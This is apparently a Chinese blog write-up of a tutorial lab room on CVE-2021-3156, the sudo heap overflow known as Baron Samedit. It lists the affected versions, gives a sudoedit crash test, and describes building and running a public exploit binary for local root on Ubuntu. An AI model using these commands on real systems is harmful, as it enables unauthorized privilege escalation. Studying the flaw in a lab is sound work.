Baron Samedit(CVE-2021-3156)
A tutorial room exploring CVE-2021-3156 in the Unix Sudo Program. Room Three in the SudoVulns Series
Sudo 堆缓冲区溢出漏洞
受影响版本:
-
Sudo 1.8.2 - 1.8.31p2
-
Sudo 1.9.0 - 1.9.5p1
POC:
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
(返回malloc(): memory corruption
Aborted (core dumped)则表示系统容易收到攻击)
EXP:
![](https://img-blog.csdnimg.cn/2021020909063232.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0MTAxMjQ4,size_16,color_FFFFFF,t_70)
POC:
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
![](https://img-blog.csdnimg.cn/20210209090631991.png)
下载EXP,cd到Exploit目录,看到一个Makefile文件,输入make即可进行编译
运行程序时提示后面要加参数0/1/2
![](https://img-blog.csdnimg.cn/20210209090632150.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0MTAxMjQ4,size_16,color_FFFFFF,t_70)
我们是Ubuntu18.04.5,所以我们使用./sudo-hax-me-a-sandwich 0
![](https://img-blog.csdnimg.cn/20210209090632101.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0MTAxMjQ4,size_16,color_FFFFFF,t_70)